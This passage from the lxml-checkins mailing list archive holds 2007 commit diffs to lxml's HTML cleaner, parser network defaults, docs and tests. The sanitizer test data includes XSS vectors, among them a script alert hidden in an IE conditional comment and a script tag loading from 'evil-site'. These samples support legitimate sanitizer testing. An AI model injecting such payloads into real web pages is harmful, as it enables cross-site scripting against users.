get is exactly the link in the document. """ link_attrs = defs.link_attrs - for el in self.iterdescendants(): + for el in _itertree(self): for attrib in link_attrs: if attrib in el.attrib: yield (el, attrib, el.attrib[attrib], 0) @@ -226,34 +226,42 @@ # make a copy of the document. The problem is it changes the # return type, as it should return the copied document and not a # serialization. Is that odd? - def __init__(self, name, fragment=False, source_class=HtmlMixin): + def __init__(self, name, copy=False, source_class=HtmlMixin): self.name = name - self.fragment = fragment + self.copy = copy self.__doc__ = getattr(source_class, self.name).__doc__ def __call__(self, doc, *args, **kw): - if 'fragment' in kw: - fragment = kw.pop('fragment') - else: - fragment = self.fragment if isinstance(doc, basestring): - if fragment: - doc = parse_element(doc) + if 'copy' in kw: + raise TypeError( + "The keyword 'copy' can only be used with element inputs to %s, not a string input" % self.name) + return_string = True + doc = parse(doc) + else: + if 'copy' in kw: + copy = kw.pop('copy') else: - doc = HTML(doc) + copy = self.copy + return_string = False + if copy: + doc = copy.deepcopy(doc) meth = getattr(doc, self.name) result = meth(*args, **kw) if result is None: - # Then serialize and return - return tostring(doc) + # Then return what we got in + if return_string: + return tostring(doc) + else: + return doc else: return result -find_rel_links = _MethodFunc('find_rel_links') -find_class = _MethodFunc('find_class') -make_links_absolute = _MethodFunc('make_links_absolute') -resolve_base_href = _MethodFunc('resolve_base_href') -iter_links = _MethodFunc('iter_links') -rewrite_links = _MethodFunc('rewrite_links') +find_rel_links = _MethodFunc('find_rel_links', copy=False) +find_class = _MethodFunc('find_class', copy=False) +make_links_absolute = _MethodFunc('make_links_absolute', copy=True) +resolve_base_href = _MethodFunc('resolve_base_href', copy=True) +iter_links = _MethodFunc('iter_links', copy=False) +rewrite_links = _MethodFunc('rewrite_links', copy=True) class HtmlComment(etree.CommentBase, HtmlMixin): pass @@ -382,10 +390,21 @@ return body[0] # Now we have a body which represents a bunch of tags which have the # content that was passed in. We will create a fake container, which - # is the body tag, except body implies too much structure. - body.tag = 'div' + # is the body tag, except <body> implies too much structure. + if _contains_block_level_tag(el): + body.tag = 'div' + else: + body.tag = 'span' return body +def _contains_block_level_tag(el): + # FIXME: I could do this with XPath, but would that just be + # unnecessarily slow? + for el in _itertree(el): + if el.tag in defs.block_tags: + return True + return False + def _element_name(el): if isinstance(el, etree.CommentBase): return 'comment' @@ -394,6 +413,16 @@ else: return el.tag +# FIXME: should this be a method? It's convenient, but I can't find a +# method that does something like it. +def _itertree(el): + """ + Return the element's descendants, and the element itself + """ + yield el + for item in el.iterdescendants(): + yield item + def Element(*args, **kw): v = html_parser.makeelement(*args, **kw) return v From ianb at codespeak.net Wed Jun 6 10:11:34 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Wed, 6 Jun 2007 10:11:34 +0200 (CEST) Subject: [Lxml-checkins] r44050 - in lxml/branch/html/src/lxml/html: . tests tests/hackers-org-data Message-ID: <20070606081134.F3FCE80CB@code0.codespeak.net> Author: ianb Date: Wed Jun 6 10:11:34 2007 New Revision: 44050 Modified: lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data lxml/branch/html/src/lxml/html/tests/test_clean.txt lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt Log: Fix some cleaning-related tests, mostly updating things that got changed when I wasn't running these tests. Also notice IE conditional comments Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Wed Jun 6 10:11:34 2007 @@ -40,6 +40,9 @@ _whitespace_re = re.compile(r'\s+') # FIXME: should data: be blocked? +_conditional_comment_re = re.compile( + r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S) + def clean_html(html, **kw): """ Like clean(), but takes a text input document, and returns a text @@ -57,6 +60,10 @@ for item in el.iterdescendants(): yield item +# FIXME: I really have to figure out what a sane set of defaults is +# for these keyword arguments. And is this signature out of control? +# What about if we want things like whitelisting of <object> or other +# controls? Maybe this has to be more than a function. def clean(doc, scripts=True, javascript=True, @@ -141,6 +148,17 @@ This modifies the document *in place*. """ + # IE conditional comments basically embed HTML that the parser doesn't + # normally see. We can't allow anything like that, so we'll kill any + # comments that could be conditional + if not comments: + bad = [] + for el in _itertree(doc): + if (isinstance(el, etree.CommentBase) + and _conditional_comment_re.search(el.text)): + bad.append(el) + for el in bad: + el.drop_element() # First, handle a case that IE treats <image> like <img>, and that can # confuse either this step or later steps. for el in doc.xpath('descendant-or-self::image'): @@ -191,6 +209,9 @@ elif new != old: el.text = new if comments or processing_instructions: + # FIXME: why either? I feel like there's some obscure reason + # because you can put PIs in comments...? But I've already + # forgotten it kill_tags.append(etree.Comment) if processing_instructions: kill_tags.append(etree.ProcessingInstruction) @@ -201,8 +222,9 @@ # del el.attrib['xmlns'] if style: kill_tags.append('style') - for el in doc.xpath('descendant-or-self::link[lower-case(@rel)="stylesheet"]'): - el.drop_element() + for el in doc.xpath('descendant-or-self::link'): + if 'stylesheet' in el.attrib.get('rel', '').lower(): + el.drop_element() for el in doc.xpath('descendant-or-self::*[@style]'): del el.attrib['style'] if links: Modified: lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data ============================================================================== --- lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data (original) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data Wed Jun 6 10:11:34 2007 @@ -1,11 +1,9 @@ Description: Downlevel-Hidden-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job http://ha.ckers.org/xss.html#XSS_Downlevel-Hidden -Options: -comments +Options: -comments, -processing_instructions <div><!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--></div> ---------- -<div>[if gte IE 4]> -<SCRIPT>alert('XSS');</SCRIPT> -<![endif]</div> +<div></div> Modified: lxml/branch/html/src/lxml/html/tests/test_clean.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_clean.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_clean.txt Wed Jun 6 10:11:34 2007 @@ -1,4 +1,4 @@ ->>> from lxml.html import HTML, tostring +>>> from lxml.html import parse, tostring >>> from lxml.html.clean import clean, clean_html >>> from lxml.html import usedoctest >>> doc = '''<html> @@ -52,7 +52,7 @@ <image src="evil!"> </body> </html> ->>> print tostring(HTML(doc)) +>>> print tostring(parse(doc)) <html> <head> <script type="text/javascript" src="evil-site"></script> @@ -78,27 +78,25 @@ <image src="evil!"> </body> </html> ->>> print clean_html(doc) +>>> print clean_html(doc, page_structure=False, safe_attrs_only=False) <html> <head> - <link rel="alternate" type="text/rss" src="evil-rss"> - <style> - body {background-image: url()}; - div {color: }; - </style> + <style>/* deleted */</style> </head> <body> <a href="">a link</a> <a href="#">another link</a> <p>a paragraph</p> <div style="display: none">secret EVIL!</div> + of EVIL! Password: - <blink>annoying EVIL!</blink> + annoying EVIL! <a href="evil-site">spam spam SPAM!</a> <img src="evil!"> </body> </html> ->>> print clean_html(doc, style=True, links=True, add_nofollow=True) +>>> print clean_html(doc, style=True, links=True, add_nofollow=True, +... page_structure=False, safe_attrs_only=False) <html> <head> </head> @@ -107,8 +105,9 @@ <a href="#">another link</a> <p>a paragraph</p> <div>secret EVIL!</div> + of EVIL! Password: - <blink>annoying EVIL!</blink> + annoying EVIL! <a href="evil-site" rel="nofollow">spam spam SPAM!</a> <img src="evil!"> </body> Modified: lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt Wed Jun 6 10:11:34 2007 @@ -75,7 +75,7 @@ is something embedded). It returns a generator of ``(element, attrib, link)``, which is awkward to test here, so we'll make a printer:: - >>> from lxml.html import iter_links + >>> from lxml.html import iter_links, HTML, tostring >>> def print_iter(seq): ... for element, attrib, link, pos in seq: ... if pos: From scoder at codespeak.net Wed Jun 6 19:55:51 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 6 Jun 2007 19:55:51 +0200 (CEST) Subject: [Lxml-checkins] r44057 - lxml/branch/html/src/lxml/html Message-ID: <20070606175551.4C2A980DD@code0.codespeak.net> Author: scoder Date: Wed Jun 6 19:55:50 2007 New Revision: 44057 Modified: lxml/branch/html/src/lxml/html/clean.py Log: cleanup: replace custom iteration function by call to getiterator(), use sets for kill_tags and remove_tags, avoid XPath calls where iteration is done anyway Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Wed Jun 6 19:55:50 2007 @@ -3,6 +3,11 @@ from lxml.html import defs from lxml.html import parse, tostring +try: + import set +except ImportError: + from sets import Set as set + __all__ = ['clean_html', 'clean', 'autolink', 'autolink_html', 'word_break', 'word_break_html'] @@ -52,14 +57,6 @@ clean(doc, **kw) return tostring(doc) -def _itertree(el): - """ - Return the element's descendants, and the element itself - """ - yield el - for item in el.iterdescendants(): - yield item - # FIXME: I really have to figure out what a sane set of defaults is # for these keyword arguments. And is this signature out of control? # What about if we want things like whitelisting of <object> or other @@ -148,12 +145,15 @@ This modifies the document *in place*. """ + if hasattr(doc, 'getroot'): + # ElementTree + doc = doc.getroot() # IE conditional comments basically embed HTML that the parser doesn't # normally see. We can't allow anything like that, so we'll kill any # comments that could be conditional if not comments: bad = [] - for el in _itertree(doc): + for el in doc.getiterator(): if (isinstance(el, etree.CommentBase) and _conditional_comment_re.search(el.text)): bad.append(el) @@ -163,10 +163,10 @@ # confuse either this step or later steps. for el in doc.xpath('descendant-or-self::image'): el.tag = 'img' - kill_tags = [] - remove_tags = list(remove_tags or []) + kill_tags = set() + remove_tags = set(remove_tags or ()) if scripts: - kill_tags.append('script') + kill_tags.add('script') if safe_attrs_only: safe_attrs = set(defs.safe_attrs) for el in doc.getiterator(): @@ -212,58 +212,85 @@ # FIXME: why either? I feel like there's some obscure reason # because you can put PIs in comments...? But I've already # forgotten it - kill_tags.append(etree.Comment) + kill_tags.add(etree.Comment) if processing_instructions: - kill_tags.append(etree.ProcessingInstruction) + kill_tags.add(etree.ProcessingInstruction) ## SB: Does this actually work? Definitely not the right place to do this. # if processing_instructions: # # FIXME: is this really the right place to remove these attributes? # for el in doc.xpath('descendant-or-self::*[@xmlns]'): # del el.attrib['xmlns'] if style: - kill_tags.append('style') + kill_tags.add('style') for el in doc.xpath('descendant-or-self::link'): if 'stylesheet' in el.attrib.get('rel', '').lower(): el.drop_element() for el in doc.xpath('descendant-or-self::*[@style]'): del el.attrib['style'] if links: - kill_tags.append('link') + kill_tags.add('link') elif javascript: # FIXME: we should get rid of included stylesheets in this # case, as you can put Javascript in them pass if meta: - kill_tags.append('meta') + kill_tags.add('meta') if page_structure: - remove_tags.extend(['head', 'html', 'title']) + remove_tags.union(('head', 'html', 'title')) if embedded: # FIXME: is <layer> really embedded? - kill_tags.extend(['applet', 'param']) + kill_tags.union(('applet', 'param')) # The alternate contents that are in an iframe are a good fallback: # FIXME: somehow embed seems to be getting data, but from what I # can tell the embed tag is supposed to always be empty - remove_tags.extend(['iframe', 'object', 'embed', 'layer']) + remove_tags.union(('iframe', 'object', 'embed', 'layer')) if frames: - kill_tags.extend(defs.frame_tags) + kill_tags.union(defs.frame_tags) if forms: - remove_tags.extend(['form']) - kill_tags.extend(['button', 'input', 'select', 'textarea']) + remove_tags.add('form') + kill_tags.union(('button', 'input', 'select', 'textarea')) if annoying_tags: - remove_tags.extend(['blink', 'marque']) - bad = [] - for el in _itertree(doc): - if el.tag in kill_tags: - bad.append(el) - for el in bad: + remove_tags.union(('blink', 'marque')) + + _remove = [] + if strip_tags: + _kill = [] + for el in doc.getiterator(): + if el.tag in kill_tags: + _kill.append(el) + elif el.tag in remove_tags: + _remove.append(el) + else: + kill_tags.update(remove_tags) + _kill = [ el for el in doc.getiterator() + if el.tag in kill_tags ] + + if _remove and _remove[0] == doc: + # We have to drop the parent-most tag, which we can't + # do. Instead we'll rewrite it: + el = _remove.pop(0) + el.tag = 'div' + el.attrib.clear() + elif _kill and _kill[0] == doc: + # We have to drop the parent-most element, which we can't + # do. Instead we'll clear it: + el = _kill.pop(0) + if el.tag != 'html': + el.tag = 'div' + el.clear() + + for el in _kill: el.drop_element() - if remove_tags: + for el in _remove: + el.drop_tag() + + if False and remove_tags: xpath = ' | '.join([ "descendant-or-self::%s" % tag for tag in remove_tags]) for el in doc.xpath(xpath): if strip_tags: - if el.getparent(): + if el.getparent() is not None: el.drop_tag() else: # We have to drop the parent-most tag, which we can't @@ -273,6 +300,7 @@ else: # FIXME: Should we test if this has been removed because of a parent? el.drop_element() + if remove_unknown_tags: if allow_tags: raise ValueError( @@ -280,7 +308,7 @@ allow_tags = defs.tags if allow_tags: bad = [] - for el in _itertree(doc): + for el in doc.getiterator(): if el.tag not in allow_tags: bad.append(el) for el in bad: From scoder at codespeak.net Thu Jun 7 08:52:46 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 08:52:46 +0200 (CEST) Subject: [Lxml-checkins] r44069 - lxml/trunk/doc Message-ID: <20070607065246.05B1480D1@code0.codespeak.net> Author: scoder Date: Thu Jun 7 08:52:45 2007 New Revision: 44069 Modified: lxml/trunk/doc/build.txt Log: doc: how to use newer libraries on Mac-OS X Modified: lxml/trunk/doc/build.txt ============================================================================== --- lxml/trunk/doc/build.txt (original) +++ lxml/trunk/doc/build.txt Thu Jun 7 08:52:45 2007 @@ -44,7 +44,7 @@ http://codespeak.net/svn/lxml/pyrex/ A subversion checkout of lxml will automatically retrieve the latest Pyrex - as external project source (``svn:externals``). Look out for the ``Pyrex`` + as external project source (``svn:externals``). Look for the ``Pyrex`` directory in the source tree. Since version 1.1.2, the lxml source distribution also includes this Pyrex @@ -182,6 +182,26 @@ lxml maintainer. +Providing newer library versions on Mac-OS X +-------------------------------------------- + +The Unix environment in Mac-OS X makes it relatively easy to install +Unix/Linux style package management tools and new software. However, it seems +to be hard to get libraries set up for exclusive usage that Mac-OS X ships in +an older version. The result can be segfaults on this platform that are hard +to track down. + +To make sure the newer libxml2 and libxslt versions are used (e.g. under +fink), you should add the directory where you installed the libraries to the +``DYLD_LIBRARY_PATH`` environment variable. This seems to fix a lot of +problems for users. + +Alternatively, you can build lxml statically. A way to do this on MS Windows +is described in the next section, but it should be easy to adapt it for +Mac-OS. That way, you can always be sure you use the versions you compiled +lxml with, regardless of the runtime environement. + + Static linking on Windows ------------------------- From scoder at codespeak.net Thu Jun 7 09:42:25 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 09:42:25 +0200 (CEST) Subject: [Lxml-checkins] r44070 - lxml/trunk/src/lxml Message-ID: <20070607074225.6416280CE@code0.codespeak.net> Author: scoder Date: Thu Jun 7 09:42:24 2007 New Revision: 44070 Modified: lxml/trunk/src/lxml/builder.py Log: E factory cleanup for lxml.etree, 'parser' keyword argument Modified: lxml/trunk/src/lxml/builder.py ============================================================================== --- lxml/trunk/src/lxml/builder.py (original) +++ lxml/trunk/src/lxml/builder.py Thu Jun 7 09:42:24 2007 @@ -16,9 +16,6 @@ return lambda *args, **kwargs: func(tag, *args, **kwargs) -class _C: - pass - class ElementMaker(object): """Element generator factory. @@ -97,7 +94,12 @@ </html> """ - def __init__(self, typemap=None): + def __init__(self, typemap=None, parser=None): + if parser is not None: + self._makeelement = parser.makeelement + else: + self._makeelement = ET.Element + # initialize type map for this element factory if typemap: @@ -121,20 +123,12 @@ attrib[k] = typemap[type(v)](None, v) typemap[dict] = add_dict - def add_elem(elem, item): - elem.append(item) - t = type(ET.Element("tag")) - if t is not type(_C()): - typemap[t] = add_elem - self._typemap = typemap - # print typemap - def __call__(self, tag, *children, **attrib): get = self._typemap.get - elem = ET.Element(tag) + elem = self._makeelement(tag) if attrib: get(dict)(elem, attrib) From scoder at codespeak.net Thu Jun 7 09:43:02 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 09:43:02 +0200 (CEST) Subject: [Lxml-checkins] r44071 - lxml/trunk Message-ID: <20070607074302.9E2B680CE@code0.codespeak.net> Author: scoder Date: Thu Jun 7 09:43:02 2007 New Revision: 44071 Modified: lxml/trunk/TODO.txt Log: 2.0: make Namespace parser local Modified: lxml/trunk/TODO.txt ============================================================================== --- lxml/trunk/TODO.txt (original) +++ lxml/trunk/TODO.txt Thu Jun 7 09:43:02 2007 @@ -58,6 +58,8 @@ * clean up (and remove?) duplicated API for extension functions +* allow (and prefer) Namespace classes local to a parser + * remove first 'context' argument from extension functions * find a way to integrate Schematron (if it's available) From scoder at codespeak.net Thu Jun 7 09:43:50 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 09:43:50 +0200 (CEST) Subject: [Lxml-checkins] r44072 - lxml/trunk/src/lxml/tests Message-ID: <20070607074350.F12BA80CE@code0.codespeak.net> Author: scoder Date: Thu Jun 7 09:43:50 2007 New Revision: 44072 Modified: lxml/trunk/src/lxml/tests/test_etree.py lxml/trunk/src/lxml/tests/test_xslt.py Log: disabled some tests on certain libxml2 versions Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py (original) +++ lxml/trunk/src/lxml/tests/test_etree.py Thu Jun 7 09:43:50 2007 @@ -390,22 +390,23 @@ xml = u'<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' self.assertRaises(_LocalException, parse, StringIO(xml), parser) - def test_entity(self): - parse = self.etree.parse - tostring = self.etree.tostring - parser = self.etree.XMLParser(resolve_entities=False) - Entity = self.etree.Entity + if etree.LIBXML_VERSION > (2,6,20): + def test_entity_parse(self): + parse = self.etree.parse + tostring = self.etree.tostring + parser = self.etree.XMLParser(resolve_entities=False) + Entity = self.etree.Entity + + xml = '<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' + tree = parse(StringIO(xml), parser) + root = tree.getroot() + self.assertEquals(root[0].tag, Entity) + self.assertFalse(root[0].text) + self.assertEquals(root[0].tail, None) + self.assertEquals(root[0].name, "myentity") - xml = '<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' - tree = parse(StringIO(xml), parser) - root = tree.getroot() - self.assertEquals(root[0].tag, Entity) - self.assertFalse(root[0].text) - self.assertEquals(root[0].tail, None) - self.assertEquals(root[0].name, "myentity") - - self.assertEquals('<doc>&myentity;</doc>', - tostring(root)) + self.assertEquals('<doc>&myentity;</doc>', + tostring(root)) def test_entity_append(self): Entity = self.etree.Entity Modified: lxml/trunk/src/lxml/tests/test_xslt.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_xslt.py (original) +++ lxml/trunk/src/lxml/tests/test_xslt.py Thu Jun 7 09:43:50 2007 @@ -37,19 +37,18 @@ def test_xslt_input_none(self): self.assertRaises(TypeError, etree.XSLT, None) - def test_xslt_invalid_stylesheet(self): - if etree.LIBXSLT_VERSION < (1,1,15): - return # no error from libxslt? - - style = self.parse('''\ + if False and etree.LIBXSLT_VERSION >= (1,1,15): + # earlier versions generate no error + if etree.LIBXSLT_VERSION > (1,1,17): + def test_xslt_invalid_stylesheet(self): + style = self.parse('''\ <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> - <xsl:template match="/"> - <xsl:template /> - </xsl:template> + <xsl:stylesheet /> </xsl:stylesheet>''') - self.assertRaises(etree.XSLTParseError, etree.XSLT, style) + self.assertRaises( + etree.XSLTParseError, etree.XSLT, style) def test_xslt_utf8(self): tree = self.parse(u'<a><b>\uF8D2</b><c>\uF8D2</c></a>') @@ -242,13 +241,12 @@ ''', st.tostring(res)) - def test_xslt_parameter_missing(self): - # DISABLED - NOT RELIABLE! - if etree.LIBXSLT_VERSION >= (1,1,18): - return # no error from libxslt? - # apply() without needed parameter will lead to XSLTApplyError - tree = self.parse('<a><b>B</b><c>C</c></a>') - style = self.parse('''\ + if etree.LIBXSLT_VERSION < (1,1,18): + # later versions produce no error + def test_xslt_parameter_missing(self): + # apply() without needed parameter will lead to XSLTApplyError + tree = self.parse('<a><b>B</b><c>C</c></a>') + style = self.parse('''\ <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> @@ -256,9 +254,9 @@ </xsl:template> </xsl:stylesheet>''') - st = etree.XSLT(style) - self.assertRaises(etree.XSLTApplyError, - st.apply, tree) + st = etree.XSLT(style) + self.assertRaises(etree.XSLTApplyError, + st.apply, tree) def test_xslt_multiple_parameters(self): tree = self.parse('<a><b>B</b><c>C</c></a>') From scoder at codespeak.net Thu Jun 7 12:53:27 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 12:53:27 +0200 (CEST) Subject: [Lxml-checkins] r44083 - in lxml/trunk: . src/lxml Message-ID: <20070607105327.53F0980D6@code0.codespeak.net> Author: scoder Date: Thu Jun 7 12:53:26 2007 New Revision: 44083 Modified: lxml/trunk/TODO.txt lxml/trunk/src/lxml/parser.pxi Log: network access disabled by default for parsers, some cleanup in parser option code Modified: lxml/trunk/TODO.txt ============================================================================== --- lxml/trunk/TODO.txt (original) +++ lxml/trunk/TODO.txt Thu Jun 7 12:53:26 2007 @@ -73,4 +73,8 @@ * clean support for entities (maybe an Entity element class?) -* disable network access in parsers by default + +Changes in 2.0 +-------------- + +* network access in parsers disabled by default Modified: lxml/trunk/src/lxml/parser.pxi ============================================================================== --- lxml/trunk/src/lxml/parser.pxi (original) +++ lxml/trunk/src/lxml/parser.pxi Thu Jun 7 12:53:26 2007 @@ -665,8 +665,9 @@ cdef int _XML_DEFAULT_PARSE_OPTIONS _XML_DEFAULT_PARSE_OPTIONS = ( - xmlparser.XML_PARSE_NOENT | + xmlparser.XML_PARSE_NOENT | xmlparser.XML_PARSE_NOCDATA | + xmlparser.XML_PARSE_NONET | xmlparser.XML_PARSE_COMPACT ) @@ -685,19 +686,19 @@ * attribute_defaults - read default attributes from DTD * dtd_validation - validate (if DTD is available) * load_dtd - use DTD for parsing - * no_network - prevent network access + * no_network - prevent network access (default: True) * ns_clean - clean up redundant namespace declarations * recover - try hard to parse through broken XML * remove_blank_text - discard blank text nodes - * compact - safe memory for short text content (default: on) - * resolve_entities - replace entities by their text value (default: on) + * compact - safe memory for short text content (default: True) + * resolve_entities - replace entities by their text value (default: True) Note that you should avoid sharing parsers between threads. While this is not harmful, it is more efficient to use separate parsers. This does not apply to the default parser. """ def __init__(self, attribute_defaults=False, dtd_validation=False, - load_dtd=False, no_network=False, ns_clean=False, + load_dtd=False, no_network=True, ns_clean=False, recover=False, remove_blank_text=False, compact=True, resolve_entities=True): cdef int parse_options @@ -712,14 +713,14 @@ if attribute_defaults: parse_options = parse_options | xmlparser.XML_PARSE_DTDATTR | \ xmlparser.XML_PARSE_DTDLOAD - if no_network: - parse_options = parse_options | xmlparser.XML_PARSE_NONET if ns_clean: parse_options = parse_options | xmlparser.XML_PARSE_NSCLEAN if recover: parse_options = parse_options | xmlparser.XML_PARSE_RECOVER if remove_blank_text: parse_options = parse_options | xmlparser.XML_PARSE_NOBLANKS + if not no_network: + parse_options = parse_options ^ xmlparser.XML_PARSE_NONET if not compact: parse_options = parse_options ^ xmlparser.XML_PARSE_COMPACT if not resolve_entities: @@ -777,7 +778,15 @@ __GLOBAL_PARSER_CONTEXT.setDefaultParser(__DEFAULT_XML_PARSER) -def setDefaultParser(_BaseParser parser=None): +def setDefaultParser(parser): + "Deprecated, please use set_default_parser instead." + set_default_parser(parser) + +def getDefaultParser(): + "Deprecated, please use get_default_parser instead." + return get_default_parser() + +def set_default_parser(_BaseParser parser=None): """Set a default parser for the current thread. This parser is used globally whenever no parser is supplied to the various parse functions of the lxml API. If this function is called without a parser (or if it is @@ -791,24 +800,19 @@ parser = __DEFAULT_XML_PARSER __GLOBAL_PARSER_CONTEXT.setDefaultParser(parser) -def getDefaultParser(): - return __GLOBAL_PARSER_CONTEXT.getDefaultParser() - -def set_default_parser(parser): - "Deprecated, please use setDefaultParser instead." - setDefaultParser(parser) - def get_default_parser(): - "Deprecated, please use getDefaultParser instead." - return getDefaultParser() + return __GLOBAL_PARSER_CONTEXT.getDefaultParser() ############################################################ ## HTML parser ############################################################ cdef int _HTML_DEFAULT_PARSE_OPTIONS -_HTML_DEFAULT_PARSE_OPTIONS = \ +_HTML_DEFAULT_PARSE_OPTIONS = ( + htmlparser.HTML_PARSE_RECOVER | + htmlparser.HTML_PARSE_NONET | htmlparser.HTML_PARSE_COMPACT + ) cdef class HTMLParser(_BaseParser): """The HTML parser. This parser allows reading HTML into a normal XML @@ -817,25 +821,25 @@ Available boolean keyword arguments: * recover - try hard to parse through broken HTML (default: True) - * no_network - prevent network access + * no_network - prevent network access (default: True) * remove_blank_text - discard empty text nodes - * compact - safe memory for short text content (default: on) + * compact - safe memory for short text content (default: True) - Note that you should avoid sharing parsers between threads for parformance + Note that you should avoid sharing parsers between threads for performance reasons. """ - def __init__(self, recover=True, no_network=False, remove_blank_text=False, + def __init__(self, recover=True, no_network=True, remove_blank_text=False, compact=True): cdef int parse_options _BaseParser.__init__(self) parse_options = _HTML_DEFAULT_PARSE_OPTIONS - if recover: - parse_options = parse_options | htmlparser.HTML_PARSE_RECOVER - if no_network: - parse_options = parse_options | htmlparser.HTML_PARSE_NONET if remove_blank_text: parse_options = parse_options | htmlparser.HTML_PARSE_NOBLANKS + if not recover: + parse_options = parse_options ^ htmlparser.HTML_PARSE_RECOVER + if not no_network: + parse_options = parse_options ^ htmlparser.HTML_PARSE_NONET if not compact: parse_options = parse_options ^ htmlparser.HTML_PARSE_COMPACT From scoder at codespeak.net Thu Jun 7 12:53:50 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 12:53:50 +0200 (CEST) Subject: [Lxml-checkins] r44084 - lxml/branch/html/src/lxml/html Message-ID: <20070607105350.6B4F180D6@code0.codespeak.net> Author: scoder Date: Thu Jun 7 12:53:50 2007 New Revision: 44084 Modified: lxml/branch/html/src/lxml/html/clean.py Log: removed disabled code section Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Thu Jun 7 12:53:50 2007 @@ -284,23 +284,6 @@ for el in _remove: el.drop_tag() - if False and remove_tags: - xpath = ' | '.join([ - "descendant-or-self::%s" % tag - for tag in remove_tags]) - for el in doc.xpath(xpath): - if strip_tags: - if el.getparent() is not None: - el.drop_tag() - else: - # We have to drop the parent-most tag, which we can't - # do. Instead we'll rewrite it: - el.tag = 'div' - el.attrib.clear() - else: - # FIXME: Should we test if this has been removed because of a parent? - el.drop_element() - if remove_unknown_tags: if allow_tags: raise ValueError( From scoder at codespeak.net Thu Jun 7 12:58:07 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 12:58:07 +0200 (CEST) Subject: [Lxml-checkins] r44085 - lxml/trunk/doc Message-ID: <20070607105807.9F1AB80D6@code0.codespeak.net> Author: scoder Date: Thu Jun 7 12:58:07 2007 New Revision: 44085 Modified: lxml/trunk/doc/tutorial.txt Log: small tutorial paragraph Modified: lxml/trunk/doc/tutorial.txt ============================================================================== --- lxml/trunk/doc/tutorial.txt (original) +++ lxml/trunk/doc/tutorial.txt Thu Jun 7 12:58:07 2007 @@ -329,11 +329,11 @@ .. _`further iterators`: api.html#iteration - - The ElementTree class ===================== +An ``ElementTree`` is mainly a wrapper around a tree with a root node. + Parsing files and XML literals ============================== From scoder at codespeak.net Thu Jun 7 14:00:52 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 14:00:52 +0200 (CEST) Subject: [Lxml-checkins] r44088 - lxml/branch/html/src/lxml/html Message-ID: <20070607120052.45CB780D9@code0.codespeak.net> Author: scoder Date: Thu Jun 7 14:00:51 2007 New Revision: 44088 Modified: lxml/branch/html/src/lxml/html/clean.py Log: more cleanup: use sets, precompiled XPath expressions and getiterator() where possible Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Thu Jun 7 14:00:51 2007 @@ -48,6 +48,12 @@ _conditional_comment_re = re.compile( r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S) +_find_styled_elements = etree.XPath( + "descendant-or-self::*[@style]") + +_find_external_links = etree.XPath( + "descendant-or-self::a[string(@href) and substring(@href,0,1) != '#']") + def clean_html(html, **kw): """ Like clean(), but takes a text input document, and returns a text @@ -165,6 +171,8 @@ el.tag = 'img' kill_tags = set() remove_tags = set(remove_tags or ()) + if allow_tags: + allow_tags = set(allow_tags) if scripts: kill_tags.add('script') if safe_attrs_only: @@ -186,7 +194,7 @@ if not style: # If we're deleting style then we don't have to remove JS links # from styles, otherwise... - for el in doc.xpath('descendant-or-self::*[@style]'): + for el in _find_styled_elements(doc): old = el.get('style') new = _css_javascript_re.sub('', old) new = _css_import_re.sub('', old) @@ -195,7 +203,7 @@ del el.attrib['style'] elif new != old: el.set('style', new) - for el in doc.xpath('descendant-or-self::style'): + for el in list(doc.getiterator('style')): if el.get('type', '').lower().strip() == 'text/javascript': el.drop_element() continue @@ -222,10 +230,10 @@ # del el.attrib['xmlns'] if style: kill_tags.add('style') - for el in doc.xpath('descendant-or-self::link'): - if 'stylesheet' in el.attrib.get('rel', '').lower(): + for el in 